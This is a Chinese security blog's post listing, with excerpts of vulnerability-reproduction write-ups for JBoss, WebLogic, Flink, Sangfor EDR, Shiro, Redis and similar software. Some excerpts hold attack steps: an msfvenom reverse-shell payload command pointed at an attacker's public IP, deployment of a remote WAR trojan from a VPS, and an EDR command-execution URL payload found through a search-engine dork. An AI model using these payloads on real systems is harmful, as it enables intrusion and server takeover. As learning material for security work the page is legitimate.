自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

cj_Hydra's Blog

从入门到放弃的白帽青年~

  • 博客(74)
  • 资源 (1)
  • 收藏
  • 关注

原创 【漏洞复现】Mysql UDF提权

前言:UDF (user defined function),即用户自定义函数。是通过添加新函数,对MySQL的功能进行扩充,其实就像使用本地MySQL函数如 user() 或 concat() 等。那么我们该如何使用UDF文件呢?默认的

2020-11-27 14:45:23 1793 2

原创 Kali安装php7.4+mysql的安装

前言:php是世界上最好的语言,可是在kali中如何安装呢?其实在默认的2020版本的kali里面已经集成了php7.3,只需要运行apt-get install php7.3即可对php7.3的安装。那么如何安装php7.4呢?添加源:首先在 etc/apt/下新建一个文件夹 trusted.gpg.dsudo apt -y install lsb-release apt-transport-https ca-certificates sudo wget -O /etc/apt/truste

2020-11-16 12:38:30 2792 2

原创 【漏洞复现】Joomla远程代码执行(RCE)

前言:Joomla是一套内容管理系统,是使用PHP语言加上MySQL数据库所开发的软件系统,最新版本为3.9.11,可以在Linux、Windows、MacOSX等各种不同的平台上执行,在CMS评测中获得“最佳开源CMS”奖!漏洞位于根目录下的configuration.php ,漏洞相关poc已在互联网公开,采用Joomla并存在漏洞的服务器已处于危险之中。影响版本:Joomla 3.0.0-3.4.6复现过程:第一步:下载源码进行环境搭建https://downloads.joomla.o

2020-11-12 14:45:19 803

原创 【实战】Jboss未授权访问(JMX-Console)Getshell

都是重复造轮子,没啥技术含量,只能说以后遇到了知道怎么操作就行。GO:访问地址:http://ip/JMX-Console找到jboss.deployment进入页面后找到void addURL()此时部署我们远程的war木马,部署好了以后点击Invokehttp:vpsIP地址/soft/cus.war随后来到URLList中查看Value值是否已经部署好,并且为我们的远程war木马地址最后点击Apply Changes 后耐心等待一会儿,然后回到JMX-Console目录中找到

2020-11-05 23:24:24 2415

原创 [漏洞复现]WebLogic 11g后台上传webshell

前言:Weblogic中间件默认端口为:7001,我这里本地在Winserver2012上搭建了weblogic 11g中间件,至于搭建的教程就不在这里写出来,网上一搜一大把,主要写的就是告诉大家当进入后台以后如何部署我们的webshell。复现:第一步:登录后台界面如下,点击部署。第二步:点击安装第三步:点击上传文件–进入文件上传界面,选择要上传的war包。第四步:制作一个war包,命令如下jar -cvf [war包名称].war 打包目录第五步:上传war包后一直点击下一步

2020-11-05 21:06:12 798

原创 【漏洞复现】Nginx 文件名逻辑漏洞(CVE-2013-4547)

前言:这个漏洞其实和代码执行没有太大关系,其主要原因是错误地解析了请求的URI,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。举个例子,比如,Nginx匹配到.php结尾的请求,就发送给fastcgi进行解析,常见的写法如下:location ~ \.php$ { include fastcgi_params; fastcgi_pass 127.0.0.1:9000; fastcgi_index index.php; fastcgi_para

2020-11-04 11:25:17 560

原创 [漏洞复现]Fastjson1.2.24反序列化环境搭建+漏洞复现

前言:Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。Fastjson 特性:提供服务器端、安卓客户端两种解析工具,性能表现较好。提供了 toJSONString() 和 parseObject() 方法来将 Java 对象与 JSON 相互转换。调用toJSONString方 法即可将对象转换成 JSON 字符串,pa

2020-11-02 11:17:18 1298

原创 xray被动扫描+burpsuite

前言:通常我们在进行web扫描漏洞时候,都是使用各种扫描器输入网址乱扫一通。这种方式虽然大众化,但存在许许多多的缺点。比如:直接扫描导致访问网站变慢、IP存在被防火墙BAN的可能。那么今天带来的新姿势就是xray被动式扫描,在我们进行手动浏览器网页时,使用burp抓包,并且对浏览过的网页进行漏洞扫描。流程如下:浏览器访问目标网址——》burp抓包——》xray检测burp所抓取的数据包。第一步:打开burp,设置代理。第二步:浏览器设置代理与burp进行联通。此时通过浏览器访问网址后的数

2020-10-26 23:34:15 1637 1

原创 [漏洞复现]Apache Flink未授权访问+远程代码命令执行

前言:近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞,影响范围:<= 1.9.1(最新版本)但是作者通过测试在版本Version: 1.11.2也是受影响的,此次复现就是通过版本Version: 1.11.2进行复现利用。漏洞复现:首先通过msfveon生成jar包,命令:msfvenom -p java/meterpreter/reverse_tcp LHOST=公网IP地址 LPORT=监听端口 -f jar > rce.jar然

2020-10-24 22:30:41 2518 1

原创 windows平台下CMDER的安装和配置

步骤:第一步:下载cmder_mini文件,打开github直接搜索cmder排名第一的就是,找到cmder_mini.zip版本下载。第二步:等待下载完成,将下载的压缩包解压,例如我将压缩包解压到“C盘”目录中,此处的目录可以自行选择。第三步:配置系统环境变量,打开我的电脑,win10电脑是找到此电脑,右击属性,更改设置,高级,环境变量。第四步:在系统变量中新建,变量名设置为CMD_HOME,变量值为当前cmder解压的路径,我的是“C:\Cmder_mini” 后点击确定。第五步:在系

2020-10-10 16:50:56 492

原创 不安全的HTTP方法(测试)

前言:我们常见的HTTP请求方法是GET、POST和HEAD。但是,其实除了这两个之外,HTTP还有一些其他的请求方法。WebDAV (Web-based Distributed Authoring and Versioning) 一种基于 HTTP 1.1协议的通信协议。它扩展了HTTP 1.1,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,使应用程序可对Web Server直接读写,并支持写文件锁定(Locking)及解锁(Unlock),还可以支持文件的版本控制。We

2020-09-08 16:05:29 2711

转载 在密码重置请求包中添加X-Forwarded-Host实现受害者账户完全劫持

今天分享的这篇Writeup为作者通过利用目标网站“忘记密码”功能,在重置密码请求发包中添加X-Forwarded-Host主机信息,欺骗目标网站把重置密码的链接导向到自己的服务器,从而实现对受害者账户的完全劫持这里,基于保密原因,先假设目标测试网站为redacted.com,在对其测试过程中,我把重点放到了它的“忘记密码”功能处。经过了6个小时的折腾,我发现了其中存在一个非常有意思的漏洞,利用该漏洞可以实现对目标受害者的完全账户劫持。发现过程:所需工具:BurpSuite、Ngrok Server.

2020-08-25 16:19:30 551

原创 某信服EDR终端检测响应平台RCE漏洞

前言:这个平台是干嘛的,这里就不废话了,刚好赶上了护网期间爆出来的,回头就被告知护网结束,这里简单复现一下。复现:第一步:通过fofa搜索语法title="终端检测响应平台"可以找到一大批使用该系统的站点。第二步:随缘点击进去一个来到主界面,也就是这个样子。第三步:构造payload,这里漏洞文件是c.php,漏洞参数是host/tool/log/c.php?strip_slashes=system&host=id直接root权限反弹shell。...

2020-08-18 10:06:31 4816 2

原创 Zookeeper未授权访问利用

前言:ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。Zookeeper 的默认开放端口是2181。Zookeeper 安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用 Zookeeper,通过服务器收集敏感信息或者在 Zookeeper 集群内进行破坏(比如:kill命令)。攻击者能够执

2020-08-05 14:42:50 4395

原创 Apache Solr远程命令执行漏洞复现+实战

前言:Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。漏洞原理:该漏洞的产生是由于两方面的原因:当攻击者可以直接访问Solr控制台时,可以通过发送类似/节点名/config的POST请求对该节点的配置文件做更改。Apache Solr默认集成VelocityResponseWriter插件,在该插件的初

2020-07-21 17:07:53 1469

原创 Redis未授权访问漏洞利用总结

没有设置密码认证(一般为空),可以免密码远程登录redis服务。

2020-06-24 17:34:09 1082

原创 ActiveMQ漏洞(CVE-2016-3088)利用总结

前言:Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。随着中间件的启动,会打开两个端口,61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 ActiveM

2020-06-23 15:51:33 1402

原创 【漏洞复现】CVE-2020-0796漏洞复现(win10系统)

前言:Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品,Microsoft Windows是一套个人设备使用的操作系统,Microsoft Windows Server是一套服务器操作系统,Server Message Block是其中的一个服务器信息传输协议。微软公布了在Server Message Block 3.0(SMBv3)中发现的“蠕虫型”预授权远程代码执行漏洞。影响版本: 适用于32位系统的Windows

2020-06-15 23:05:15 4776

原创 【漏洞复现】ApacheShiro1.2.4反序列化漏洞复现(CVE-2016-4437)

前言:Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。影响版本:Apache Shiro <= 1.2.4漏洞原理:Apache Shiro 1.2.4及以前版本中,Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值 > Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码

2020-06-15 00:01:28 2022 4

原创 【漏洞复现】JBoss反序列化漏洞(CVE-2017-12149)

前言:JBoss 反序列化漏洞,该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致恶意访问者通过精心设计的序列化数据执行任意代码。但近期有安全研究者发现JBossAS 6.x也受该漏洞影响,恶意访问者利用该漏洞无需用户验证即可获得服务器的控制权。该漏洞的细节和验证代码已公开,为避免造成损失,建议及时修复升级至JBossAS 7版本影响版本:

2020-05-18 16:46:22 2077

原创 kali安装docker说明

使用kali安装docker非常简单。只需要几条命令。首先添加更新源,来到位置/etc/apt/sources.list通过vim进行编辑后添加如下源:deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-freedeb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free然后执行如下命令:curl -fsSL http://m

2020-05-18 09:46:37 379

原创 phpMyAdmin(LOAD DATA INFILE) 任意文件读取漏洞(测试)

前言:最近在做ctf题时发现关于mysql任意文件读取漏洞的考点非常频繁,而且一直都朦胧不清,也没去学习,在不久前的DDCTF和国赛,还有最近的Nu1lCTF中都考到了这个点,利用Load data infile语法。在mysql客户端登陆mysql服务端后,客户端执行语句Load data local infile ‘/etc/passwd’ into table proc;,从而可以导致my...

2020-04-23 16:32:07 1406

原创 Web安全访问控制及权限提升漏洞

一、什么是访问控制?简单的来说就是应用程序首先会判断用户的身份(账号密码登录),随后确认后续请求是否由该用户发出(会话管理),然后判断是否允许用户执行“所请求的操作”或访问“所请求的资源(访问控制)”1、从用户角度访问控制模型分为以下类型:垂直访问控制:控制不同权限等级的用户访问应用程序不同的功能;如“管理员”可以修改/删除账号,而普通账号无法操作。水平访问控制:控制用户只能访问自己的资...

2020-04-23 11:03:11 2320

原创 文件上传漏洞绕过总结

前言:一:漏洞产生的原因由于文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型,导致攻击者能够向某个可通过web访问的目录上传恶意文件,并被脚本解析器执行,这样就可以在服务器上执行恶意脚本。关于文件上传漏洞绕过的练习,可以通过自己搭建源码upload-labs来学习。二:常见的文件检测方式与绕过方式前端js检测:绕过方式:在前端页面修改js或者删除当前js直接上传,抓包...

2020-04-21 14:20:19 2047 3

原创 MYSQL注入之宽字节注入

一、经典sql注入漏洞当前例子1中并没有对$_GET[‘name’]的值进行过滤,所以是存在sql注入漏洞的。<?php $name=$_GET['name']; $conn=mysql_connect('localhost','root','root'); if($conn==null){exit("connect error !<br>");} mysql...

2020-04-16 09:32:21 433

原创 【漏洞复现】Metasploit下利用ms16-075提权

前言:ms16-075漏洞介绍:Windows SMB 服务器特权提升漏洞(CVE漏洞编号:CVE-2016-3225)当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞,成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。若要利用此漏洞,攻击者首先必须登录系统。然后,攻击者可以运行一个为利用此漏洞而经特殊设计的应...

2020-04-13 17:04:29 3671

原创 Windows Server2008域环境的搭建以及域环境的加入。

前言:在域架构中,最核心的就是DC(Domain Control,域控制器),创建域首先要创建DC,DC创建完成后,把所有的客户端加入到DC,这样就形成了域环境。域控制器是由工作组计算机升级而成,通过 dcpromo 命令就可以完成升级。只有Windows Server(WEB版本除外)才可以提升为域控制器。在升级DC之前不需要安装DNS服务,域控制器上必须要有NTFS文件系统的分区。操作:...

2020-04-13 11:55:53 1678

原创 IIS短文件名泄露漏洞

前言:漏洞描述:Internet Information Services(IIS,互联网信息服务)是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。Microsoft IIS在实现上存在文件枚举漏洞,攻击者可利用此漏洞枚举网络服务器根目录中的文件。危害:攻击者可以利用“~”字符猜解或遍历服务器中的文件名,或对IIS服务器中的.Net Framework进行拒绝服...

2020-04-07 14:14:22 2527

原创 [漏洞复现]CVE-2020-1938漏洞复现

前言:漏洞介绍:Tomcat默认开启AJP服务(8009端口),存在一处文件包含缺陷。攻击者可以通过构造的恶意请求包来进行文件包含操作,从而读取有漏洞的Tomcat服务器上Web目录文件。影响版本:Apache Tomcat 6Apache Tomcat 7 < 7.0.100Apache Tomcat 8 < 8.5.51Apache Tomcat 9 < 9.0....

2020-03-30 17:47:38 2403

原创 使用Ngrok来进行内网端口转发

前言:在学习了网络安全之后,我们知道了公网和私网(内网),私网是不能直接在公网传输和通信的。比如一个学校,一个公司,都是单独在自己的私网里面,通过这个私网内部的路由器(NAPT方式)和外界通信。那么如果A公司的员工要和B公司的员工通过公司的网络进行通信,由于A公司的员工和B公司的员工都是在单独的私网里面,那么怎么办呢?内网转发:通过字面的意思也不难理解,就是将内部的网络和端口,也就私网的网络...

2020-03-30 10:48:27 1163 2

原创 【漏洞复现】MS12-020漏洞复现利用

前言:MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞**影响范围:**开了RDP的Microsoft Windows XP ProfessionalMicrosoft Windows XP HomeMicrosoft Windows Server 2003 Standard EditionMicrosoft Windows Server 2003...

2020-03-07 14:58:58 1798 1

转载 sqlmap,Tamper详解及使用指南

sqlmap,Tamper详解及使用指南:sqlmap版本当前为1.2.7.20,共有57个tamper脚本,与1.0版本相比新增了19个脚本。0x2char:将每个编码后的字符转换为等价表达apostrophemask:单引号替换为Utf8字符apostrophenullencode:替换双引号为%00%27appendnullbyte:有效代码后添加%00base64encode...

2020-03-06 22:13:27 1559

转载 vulhub docker-compose报错:No module named ssl_match_hostname(Kali环境下)

最后编辑时间:2019/4/5当前docker-compose版本:docker-compose version 1.25.4, build unknown当前kali内核:Linux kali 5.2.0-kali3-amd64 #1 SMP Debian 5.2.17-1kali2 (2019-10-17) x86_64 GNU/Linux报错提示 No module named ssl...

2020-03-02 14:07:47 909

原创 PHP 反序列化漏洞学习及CVE-2016-7124漏洞利用

前言:什么是php序列化和反序列化?简单的理解:序列化就是使用serialize()将对象用字符串的方式进行表示并赋值给变量,反序列化是使用unserialize()将序列化的后字符串(这里的的字符串就是对象序列化之后的产物)构成相应的对象,反序列化是序列化的逆过程。序列化serialize()操作:serialize() 返回字符串,此字符串包含了表示 value 的字节流,可以存储于...

2020-03-02 12:23:14 1419 1

原创 Apache2配置目录分析

前言:这里apache2是Ubuntu下发行的架构网站的版本,apache2和apache有点不同,包括配置文件名的不同等。接下来我将演示Apache2的基本配置与一些细节。方法:由于这里是Ubuntu环境,安装的方式直接就是apt-get install apache2安装好了以后。apache2的默认配置路径是在/etc/apache2下的,并且和apache不同的是根本不存在http...

2020-02-27 16:18:46 1292

原创 Netcat的简单使用

前言:Necat简称nc,拥有“瑞士军刀”的美誉,nc小巧强悍,可以读写TCP和UDP网络连接,它是基于SOCKET协议工作,支持windows端和Linux端。它的功能有很多,常用的功能如下:但是实际用来反弹shell的较多。端口扫描聊天文件传输反弹shell常见方法:端口扫描:nc64 -z -v -n ip地址 端口范围聊天:可以利用nc做一个简单版本的聊天工具,...

2020-02-27 14:31:26 490

原创 Linux常用命令集合(基础篇)

Linux常用命令集合(基础篇)查看发行版本:cat /etc/issuecat /etc/*-releasecat /etc/isb-release 基于Debiancat /etc/redhat-release 基于redhatcat /proc/versionecho:用于在终端输出字符串或者变量提取后的值 如:echo 123 / echo $SHELLdate:...

2020-02-26 21:32:17 286

原创 php文件包含漏洞总结

前言一:什么是文件包含漏洞?服务器通过PHP的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我可以构造这个恶意文件来达到攻击的目的。漏洞产生的根本原因就是,在通过php的函数引入文件时,没有对传入的文件名经过合理的校验,从而操作了预想 之外的文件(也就是恶意文件)。二:是不是只有php才有文件包含漏洞?当然不是的,只是文件包含漏洞比较常出现...

2020-02-26 14:31:14 1315

原创 【漏洞复现】CVE-2019-1388漏洞复现

前言:漏洞简介该漏洞位于Windows的UAC(User Account Control,用户帐户控制)机制中默认情况下,Windows会在一个单独的桌面上显示所有的UAC提示 Secure Desktop这些提示是由名为 consent.exe 的可执行文件产生的,该可执行文件以NT AUTHORITY\SYSTEM权限运行,完整性级别为System因为用户可以与该UI交互,因此对UI...

2020-02-25 16:26:24 699

原创 BlueCms 1.6代码审计之Union 注入

前言:非常基础的代码审计练习的cms系统,适合有php基础的审计新手练习,当然了该套cms还有不少的其他漏洞,这里该篇文件只是介绍Union注入。准备环境:phpstudy工具BlueCms1.6源码Sublime编辑器安装了Ctags插件代码审计:首先主页面index.php代码如下,可以看到开头便引用了2个文件,一个是include/common.inc.php和include/...

2020-02-24 17:21:47 549

Fastjson1.2.47以及之前的所有版本

Fastjson1.2.47以及之前的所有版本

2020-10-26

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除